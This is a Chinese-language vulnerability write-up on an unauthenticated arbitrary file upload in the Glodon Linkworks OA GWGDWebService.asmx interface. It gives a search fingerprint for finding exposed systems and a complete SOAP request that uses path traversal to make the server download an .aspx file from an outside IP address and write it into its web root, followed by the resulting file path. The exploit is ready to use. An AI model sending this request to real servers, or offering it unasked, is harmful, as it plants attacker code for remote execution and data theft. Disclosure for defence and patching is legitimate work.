登录 白背景

广联达OA GWGDWebService存在任意文件上传漏洞

一、漏洞简介

广联达Linkworks办公OA(Office Automation)是一款综合办公自动化解决方案,旨在提高组织内部的工作效率和协作能力。它提供了一系列功能和工具,帮助企业管理和处理日常办公任务、流程和文档。由于广联达 LinkWorks /GB/LK/ArchiveManagement/Js/GWGDWebService.asmx接口处设置不当,未经身份认证的攻击者通过该漏洞上传恶意文件,可能导致恶意代码执行、身份伪造、后门植入、敏感数据泄露等问题。

二、影响版本

  • 广联达办公OA

三、资产测绘

  • app.name="广联达 OA"
  • 登录页面

image.png

四、漏洞复现

  1. 新建stc.aspx文件上传到服务器启动web服务

image.png

  1. 上传文件
POST /GB/LK/ArchiveManagement/Js/GWGDWebService.asmx HTTP/1.1
Host: 
Content-Type: text/xml; charset=utf-8
User-Agent: Mozilla/5.0 

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
  <soapenv:Header/>
  <soapenv:Body>
      <tem:GetGWGDData>
        <!--Optional:-->
        <tem:data>
            <root>
              <GWINFO>
                  <公文标题>1</公文标题>
                  <拟稿人>拟稿人</拟稿人>
                  <主送单位>主送单位</主送单位>
                  <主题词>主题词</主题词>
                  <印发份数>1</印发份数>
                  <签发日期>2022-12-07</签发日期>
              </GWINFO>
              <aa>
                  <FileName>./../../../../../../../applications/gtp-default/Web/Common/768a9b.aspx</FileName>
                  <DownLoadURL>http://172.245.154.22:9999/stc.aspx</DownLoadURL>
              </aa>
            </root>
        </tem:data>
      </tem:GetGWGDData>
  </soapenv:Body>
</soapenv:Envelope>

image.png

  1. 上传文件位置
/Common/768a9b.aspx

image.png

原文: https://www.yuque.com/xiaokp7/ocvun2/fdokaunnc20e1deq